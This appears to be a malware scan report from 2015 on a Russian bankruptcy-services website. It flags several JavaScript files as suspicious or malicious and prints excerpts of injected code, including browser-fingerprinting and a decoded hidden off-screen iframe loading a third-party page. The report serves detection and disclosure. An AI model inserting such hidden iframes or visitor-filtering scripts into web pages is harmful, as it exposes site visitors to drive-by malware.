Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=yavbankrotstve.com
Result: Google has marked this website as suspicious; visiting it may harm your computer.
Details are available here.
Result: Google has marked this website as suspicious; visiting it may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://yavbankrotstve.com/ | 200 OK Content-Length: 11605 Content-Type: text/html | clean |
http://yavbankrotstve.com/templates/jblank/js/swfobject.js | 200 OK Content-Length: 11845 Content-Type: application/x-javascript | suspicious |
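Suspicious code: the script contains an iframe. In the decoded payload below, the iframe loads a page from a third-party host and is positioned off-screen (left:-1370px; top:-1370px), so it is not visible to the visitor. (function(){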
function stripos (r_haystack, r_needle, r_offset) { var haystack = (r_haystack + '').toLowerCase(); var needle = (r_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, r_offset)) !== -1) { return index; } return false; } function browserData(){ var BrowserBlock = ['Series60','Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','N ...[3866 bytes skipped]... Decoded script: function f() { if (J) { return; } try { var Z = j.getElementsByTagName("body")[0].appendChild(C("span")); Z.parentNode.removeChild(Z); } catch (aa) { return; } J = true; var X = U.length; for (var Y = 0; Y < X; Y++) { U[Y](); } } <iframe src="http://posimak.flashllp.com/dahaerhjgfjeaureytruwru12.html" Name="Position" style="position:absolute;left:-1370px;top:-1370px;" height="160" width="160"></iframe> | ||
http://yandex.st/jquery/1.7.1/jquery.min.js | 200 OK Content-Length: 93868 Content-Type: application/x-javascript | clean |
http://yavbankrotstve.com/modules/mod_swmenufree/fix_wmode2transparent_swf.js | 200 OK Content-Length: 4032 Content-Type: application/x-javascript | malicious |
Malicious code, confirmed by antivirus engines (see below). (function(){
function stripos (r_haystack, r_needle, r_offset) { var haystack = (r_haystack + '').toLowerCase(); var needle = (r_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, r_offset)) !== -1) { return index; } return false; } function browserData(){ var BrowserBlock = ['Series60','Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD if (this.name == "wmode") { flag=true; str_tag += '<PARAM NAME="' + this.name + '" VALUE="transparent">'; } else str_tag += '<PARAM NAME="' + this.name + '" VALUE="' + this.value + '">'; } }); if(!flag) str_tag += '<PARAM NAME="wmode" VALUE="transparent">'; str_tag += '</OBJECT>'; jQuery(str_tag).insertAfter(this); jQuery(this).remove(); }); } ;;;;;;;;;;;;;;;;;;;;;;;;;; Decoded script: function LJQ() { var sc = document.createElement("script"); sc.type = "text/javascript"; sc.src = "http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"; sc.id = "script1"; sc.defer = "defer"; document.getElementsByTagName("head")[0].appendChild(sc); window.noConflict = true; } <iframe src="http://posimak.flashllp.com/dahaerhjgfjeaureytruwru12.html" Name="Position" style="position:absolute;left:-1370px;top:-1370px;" height="160" width="160"></iframe> Antivirus reports:
| ||
http://yavbankrotstve.com/modules/mod_swmenufree/jquery-1.6.min.js | 200 OK Content-Length: 92169 Content-Type: application/x-javascript | malicious |
Malicious code, confirmed by antivirus engines (see below). (function(){
function stripos (r_haystack, r_needle, r_offset) { var haystack = (r_haystack + '').toLowerCase(); var needle = (r_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, r_offset)) !== -1) { return index; } return false; } function browserData(){ var BrowserBlock = ['Series60','Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD Antivirus reports:
| ||
http://yavbankrotstve.com/modules/mod_swmenufree/DropDownMenuX_Packed.js | 200 OK Content-Length: 14338 Content-Type: application/x-javascript | malicious |
Malicious code, confirmed by antivirus engines (see below). (function(){
function stripos (r_haystack, r_needle, r_offset) { var haystack = (r_haystack + '').toLowerCase(); var needle = (r_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, r_offset)) !== -1) { return index; } return false; } function browserData(){ var BrowserBlock = ['Series60','Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD Antivirus reports:
| ||
http://yavbankrotstve.com/services | 200 OK Content-Length: 12190 Content-Type: text/html | clean |
http://yavbankrotstve.com/partners | 200 OK Content-Length: 11202 Content-Type: text/html | clean |
http://yavbankrotstve.com/yavprave.com | 404 Not Found Content-Length: 210 Content-Type: text/html | clean |
http://yavbankrotstve.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://yavbankrotstve.com/contacts | 200 OK Content-Length: 11310 Content-Type: text/html | clean |
http://yavbankrotstve.com/about | 200 OK Content-Length: 11064 Content-Type: text/html | clean |
http://yavbankrotstve.com/kejsy | 200 OK Content-Length: 11074 Content-Type: text/html | clean |
http://yavbankrotstve.com/publikatsii | 200 OK Content-Length: 12386 Content-Type: text/html | clean |
http://yavbankrotstve.com/publikatsii/vneshnee-upravlenie-pri-bankrotstve | 200 OK Content-Length: 20827 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: yavbankrotstve.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Fri, 23 Jan 2015 10:40:26 GMT
Pragma: no-cache
Server: nginx/1.6.2
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: c3d2d83b2a7dae7de7a8348d76805d93=6d1bf056a7991f66b4120ce6e1e2ffb9; path=/
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: yavbankrotstve.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Fri, 23 Jan 2015 10:40:26 GMT
Pragma: no-cache
Server: nginx/1.6.2
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: c3d2d83b2a7dae7de7a8348d76805d93=6d1bf056a7991f66b4120ce6e1e2ffb9; path=/
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: yavbankrotstve.com
Referer: http://www.google.com/search?q=yavbankrotstve.com
Result:
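The response is similar to the first query; no suspicious redirects were found. This check varies only the Referer header, so it does not rule out behaviour that depends on the client: the injected script listed above builds a list of browser and platform strings (BrowserBlock) and presumably uses it to decide which visitors receive the payload.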
GET / HTTP/1.1
Host: yavbankrotstve.com
Referer: http://www.google.com/search?q=yavbankrotstve.com
Result:
The result is similar to the first query. There are no suspicious redirects found.